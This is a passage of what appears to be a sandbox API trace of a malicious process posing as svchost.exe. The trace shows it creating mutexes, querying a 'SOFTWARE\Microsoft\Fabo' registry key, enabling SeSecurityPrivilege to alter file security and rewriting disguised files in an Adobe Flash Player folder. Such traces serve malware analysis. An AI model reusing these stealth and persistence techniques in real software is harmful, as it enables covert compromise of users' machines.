cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="A7") returned 2 [0120.202] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="3D") returned 2 [0120.202] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="98") returned 2 [0120.203] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="3C") returned 2 [0120.203] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="6D") returned 2 [0120.203] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="EA") returned 2 [0120.203] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="FF") returned 2 [0120.203] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="4C") returned 2 [0120.203] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="38") returned 2 [0120.203] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="48") returned 2 [0120.203] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="A7") returned 2 [0120.203] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="7D0000008AA73D983C6DEAFF4C3848A7") returned 0x1a8 [0120.203] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xffffffff) returned 0x0 [0120.203] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x735f644 | out: phkResult=0x735f644*=0x1ac) returned 0x0 [0120.204] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x735f670, lpData=0x0, lpcbData=0x735f654*=0x0 | out: lpType=0x735f670*=0x0, lpData=0x0, lpcbData=0x735f654*=0x0) returned 0x2 [0120.204] RegCloseKey (hKey=0x1ac) returned 0x0 [0120.204] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0120.204] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x735f648 | out: lpFileSize=0x735f648*=0) returned 1 [0120.204] CloseHandle (hObject=0x1ac) returned 1 [0120.204] GetLastError () returned 0x0 [0120.204] GetLastError () returned 0x0 [0120.204] GetLocalTime (in: lpSystemTime=0x735f658 | out: lpSystemTime=0x735f658*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x271)) [0120.205] GetCurrentThreadId () returned 0xd70 [0120.205] GetCurrentProcessId () returned 0x2ec [0120.205] wvnsprintfW (in: pszDest=0x54022f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f5fc | out: pszDest="[13.10.2016 15:43:22] ver=2.2.5, log=0x0006, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0120.205] wvnsprintfW (in: pszDest=0x540239c, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x735f678 | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0120.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0006, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0006, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5403300, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0006, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0006, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0006, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5403398, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0006, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.206] GetSystemTime (in: lpSystemTime=0x735f248 | out: lpSystemTime=0x735f248*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x271)) [0120.206] SystemTimeToFileTime (in: lpSystemTime=0x735f248, lpFileTime=0x735f238 | out: lpFileTime=0x735f238) returned 1 [0120.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x54120f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0120.206] GetUserNameExW () returned 0x1 [0120.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413088, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0120.207] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="8A") returned 2 [0120.207] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="00") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="00") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="00") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="B7") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="49") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="67") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="98") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="F6") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="14") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="59") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="35") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="AA") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="3E") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="27") returned 2 [0120.208] wvnsprintfW (in: pszDest=0x735f030, cchDest=6, pszFmt="%02X", arglist=0x735f00c | out: pszDest="60") returned 2 [0120.208] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1b8 [0120.209] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0120.309] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0120.309] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0120.309] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0120.310] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0120.310] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0120.310] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0120.311] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0120.311] GetCurrentThread () returned 0xfffffffe [0120.311] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f294 | out: TokenHandle=0x735f294*=0x0) returned 0 [0120.311] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f294 | out: TokenHandle=0x735f294*=0x1a4) returned 1 [0120.311] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f29c | out: lpLuid=0x735f29c*(LowPart=0x8, HighPart=0)) returned 1 [0120.315] AdjustTokenPrivileges (in: TokenHandle=0x1a4, DisableAllPrivileges=0, NewState=0x735f298*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.315] GetLastError () returned 0x0 [0120.315] CloseHandle (hObject=0x1a4) returned 1 [0120.315] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.315] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52142e0, lpbSaclPresent=0x735f2cc, pSacl=0x735f2c0, lpbSaclDefaulted=0x735f2c8 | out: lpbSaclPresent=0x735f2cc, pSacl=0x735f2c0, lpbSaclDefaulted=0x735f2c8) returned 1 [0120.316] SetNamedSecurityInfoW () returned 0x0 [0120.324] LocalFree (hMem=0x52142e0) returned 0x0 [0120.324] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0120.324] GetCurrentThread () returned 0xfffffffe [0120.325] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f294 | out: TokenHandle=0x735f294*=0x0) returned 0 [0120.325] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f294 | out: TokenHandle=0x735f294*=0x1a4) returned 1 [0120.325] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f29c | out: lpLuid=0x735f29c*(LowPart=0x8, HighPart=0)) returned 1 [0120.329] AdjustTokenPrivileges (in: TokenHandle=0x1a4, DisableAllPrivileges=0, NewState=0x735f298*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.329] GetLastError () returned 0x0 [0120.329] CloseHandle (hObject=0x1a4) returned 1 [0120.329] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.329] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214100, lpbSaclPresent=0x735f2cc, pSacl=0x735f2c0, lpbSaclDefaulted=0x735f2c8 | out: lpbSaclPresent=0x735f2cc, pSacl=0x735f2c0, lpbSaclDefaulted=0x735f2c8) returned 1 [0120.329] SetNamedSecurityInfoW () returned 0x0 [0120.331] LocalFree (hMem=0x5214100) returned 0x0 [0120.331] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0120.332] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x735f2e0 | out: lpFileSize=0x735f2e0*=2451) returned 1 [0120.332] VirtualAlloc (lpAddress=0x0, dwSize=0x993, flAllocationType=0x3000, flProtect=0x4) returned 0x4ee0000 [0120.332] ReadFile (in: hFile=0x1a4, lpBuffer=0x4ee0000, nNumberOfBytesToRead=0x993, lpNumberOfBytesRead=0x735f2ec, lpOverlapped=0x0 | out: lpBuffer=0x4ee0000*, lpNumberOfBytesRead=0x735f2ec*=0x993, lpOverlapped=0x0) returned 1 [0120.337] CloseHandle (hObject=0x1a4) returned 1 [0120.338] wvnsprintfA (in: pszDest=0x5413a28, cchDest=21, pszFmt="%d", arglist=0x735f230 | out: pszDest="1476366141") returned 10 [0120.339] wvnsprintfA (in: pszDest=0x5413988, cchDest=21, pszFmt="%d", arglist=0x735f230 | out: pszDest="1476366141") returned 10 [0120.340] wvnsprintfA (in: pszDest=0x5413a08, cchDest=21, pszFmt="%d", arglist=0x735f230 | out: pszDest="1476366142") returned 10 [0120.341] wvnsprintfA (in: pszDest=0x5413a08, cchDest=21, pszFmt="%d", arglist=0x735f230 | out: pszDest="1476366142") returned 10 [0120.362] wvnsprintfA (in: pszDest=0x5413a08, cchDest=21, pszFmt="%d", arglist=0x735f230 | out: pszDest="1476366147") returned 10 [0120.363] wvnsprintfA (in: pszDest=0x5413a08, cchDest=21, pszFmt="%d", arglist=0x735f230 | out: pszDest="1476366147") returned 10 [0120.364] wvnsprintfA (in: pszDest=0x5413a08, cchDest=21, pszFmt="%d", arglist=0x735f230 | out: pszDest="1476366202") returned 10 [0120.365] wvnsprintfA (in: pszDest=0x5413868, cchDest=21, pszFmt="%d", arglist=0x735f230 | out: pszDest="1476366202") returned 10 [0120.366] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0120.369] WriteFile (in: hFile=0x1e4, lpBuffer=0x5406c78*, nNumberOfBytesToWrite=0xa95, lpNumberOfBytesWritten=0x735f2e4, lpOverlapped=0x0 | out: lpBuffer=0x5406c78*, lpNumberOfBytesWritten=0x735f2e4, lpOverlapped=0x0) returned 1 [0120.370] CloseHandle (hObject=0x1e4) returned 1 [0120.376] ReleaseMutex (hMutex=0x1b8) returned 1 [0120.390] CloseHandle (hObject=0x1b8) returned 1 [0120.390] SetLastError (dwErrCode=0x0) [0120.391] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0120.391] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x735f194 | out: phkResult=0x735f194*=0x1b8) returned 0x0 [0120.391] RegQueryValueExW (in: hKey=0x1b8, lpValueName="Vipoug", lpReserved=0x0, lpType=0x735f1bc, lpData=0x0, lpcbData=0x735f1a4*=0x0 | out: lpType=0x735f1bc*=0x0, lpData=0x0, lpcbData=0x735f1a4*=0x0) returned 0x2 [0120.391] RegCloseKey (hKey=0x1b8) returned 0x0 [0120.391] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x735f3f4 | out: phkResult=0x735f3f4*=0x1b8) returned 0x0 [0120.391] RegQueryValueExW (in: hKey=0x1b8, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x735f420, lpData=0x0, lpcbData=0x735f404*=0x0 | out: lpType=0x735f420*=0x0, lpData=0x0, lpcbData=0x735f404*=0x0) returned 0x2 [0120.391] RegCloseKey (hKey=0x1b8) returned 0x0 [0120.392] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0120.392] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x735f3f8 | out: lpFileSize=0x735f3f8*=0) returned 1 [0120.392] CloseHandle (hObject=0x1b8) returned 1 [0120.392] GetLastError () returned 0x0 [0120.392] GetLastError () returned 0x0 [0120.392] GetLocalTime (in: lpSystemTime=0x735f408 | out: lpSystemTime=0x735f408*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x32c)) [0120.392] GetCurrentThreadId () returned 0xd70 [0120.392] GetCurrentProcessId () returned 0x2ec [0120.392] wvnsprintfW (in: pszDest=0x54022d0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f3ac | out: pszDest="[13.10.2016 15:43:22] ver=2.2.5, log=0x000A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0120.392] wvnsprintfW (in: pszDest=0x540237c, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x735f428 | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0120.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x000A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x000A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x54032e0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x000A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x000A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x000A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x54020b0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x000A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.393] GetSystemTime (in: lpSystemTime=0x735eff8 | out: lpSystemTime=0x735eff8*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x32c)) [0120.393] SystemTimeToFileTime (in: lpSystemTime=0x735eff8, lpFileTime=0x735efe8 | out: lpFileTime=0x735efe8) returned 1 [0120.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412068, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0120.394] GetUserNameExW () returned 0x1 [0120.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413208, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0120.395] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="8A") returned 2 [0120.395] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="00") returned 2 [0120.395] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="00") returned 2 [0120.395] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="00") returned 2 [0120.395] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="B7") returned 2 [0120.396] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="49") returned 2 [0120.396] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="67") returned 2 [0120.396] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="98") returned 2 [0120.396] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="F6") returned 2 [0120.396] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="14") returned 2 [0120.396] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="59") returned 2 [0120.396] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="35") returned 2 [0120.396] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="AA") returned 2 [0120.396] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="3E") returned 2 [0120.396] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="27") returned 2 [0120.396] wvnsprintfW (in: pszDest=0x735ede0, cchDest=6, pszFmt="%02X", arglist=0x735edbc | out: pszDest="60") returned 2 [0120.396] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1b8 [0120.396] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0120.589] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0120.589] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0120.590] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0120.590] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0120.590] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0120.591] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0120.591] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0120.591] GetCurrentThread () returned 0xfffffffe [0120.591] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f044 | out: TokenHandle=0x735f044*=0x0) returned 0 [0120.592] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f044 | out: TokenHandle=0x735f044*=0x1b0) returned 1 [0120.592] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f04c | out: lpLuid=0x735f04c*(LowPart=0x8, HighPart=0)) returned 1 [0120.593] AdjustTokenPrivileges (in: TokenHandle=0x1b0, DisableAllPrivileges=0, NewState=0x735f048*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, 